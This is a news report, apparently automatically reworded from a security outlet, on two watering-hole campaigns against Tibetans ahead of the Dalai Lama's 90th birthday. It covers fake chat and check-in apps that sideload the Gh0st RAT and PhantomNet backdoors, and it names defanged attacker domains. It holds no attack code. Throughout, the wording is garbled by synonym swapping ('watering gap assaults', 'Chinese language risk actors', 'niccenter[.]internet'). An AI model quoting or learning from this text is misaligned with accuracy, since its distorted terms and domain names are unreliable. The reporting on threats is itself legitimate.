The Tibetan group has been focused by a China-nexus cyber espionage group as a part of two campaigns carried out final month forward of the Dalai Lama’s ninetieth birthday on July 6, 2025.
The multi-stage assaults have been codenamed Operation GhostChat and Operation PhantomPrayers by Zscaler ThreatLabz.
“The attackers compromised a professional web site, redirecting customers by way of a malicious hyperlink and finally putting in both the Gh0st RAT or PhantomNet (aka SManager) backdoor onto sufferer programs,” safety researchers Sudeep Singh and Roy Tay stated in a Wednesday report.
This isn’t the primary time Chinese language risk actors have resorted to watering gap assaults (aka strategic net compromises), a method the place adversaries break into web sites ceaselessly visited by a selected group to contaminate their units with malware.
Over the previous two years, hacking teams like EvilBamboo, Evasive Panda, and TAG-112 have all resorted to the strategy to focus on the Tibetan diaspora with the last word objective of gathering delicate info.
 |
| Operation GhostChat |
The most recent set of assaults noticed by Zscaler entails the compromise of an internet web page to interchange the hyperlink pointing to “tibetfund[.]org/90thbirthday” with a fraudulent model (“thedalailama90.niccenter[.]internet”).
Whereas the unique net web page is designed to ship a message to the Dalai Lama, the reproduction web page provides an choice to ship an encrypted message to the religious chief by downloading from “tbelement.niccenter[.]internet” a safe chat software named TElement, which claims to be Tibetan model of Factor.
Hosted on the web site is a backdoored model of the open-source encrypted chat software program containing a malicious DLL that is sideloaded to launch Gh0st RAT, a distant entry trojan broadly utilized by numerous Chinese language hacking teams. The online web page additionally contains JavaScript code designed to gather the customer’s IP handle and user-agent info, and exfiltrate the small print to the risk actor by way of an HTTP POST request.
 |
| Operation PhantomPrayers |
Gh0st RAT is a fully-featured malware that helps file manipulation, display seize, clipboard content material extraction, webcam video recording, keylogging, audio recording and playback, course of manipulation, and distant shell.
The second marketing campaign, Operation PhantomPrayers, has been discovered to leverage one other area, “hhthedalailama90.niccenter[.]internet,” to distribute a phony “ninetieth Birthday World Verify-in” app (“DalaiLamaCheckin.exe,” dubbed PhantomPrayers) that, when opened, shows an interactive map and urges victims to “ship your blessings” for the Dalai Lama by tapping their location on the map.
Nonetheless, the malicious performance is stealthily triggered within the background, utilizing DLL side-loading strategies to launch PhantomNet, a backdoor that establishes contact with a command-and-control (C2) server over TCP to obtain extra plugin DLLs for execution on the compromised machine.
“PhantomNet will be set to function solely throughout particular hours or days, however this functionality shouldn’t be enabled within the present pattern,” the researchers stated. “PhantomNet used modular plugin DLLs, AES-encrypted C2 visitors, and configurable timed operations, to stealthily handle compromised programs.”
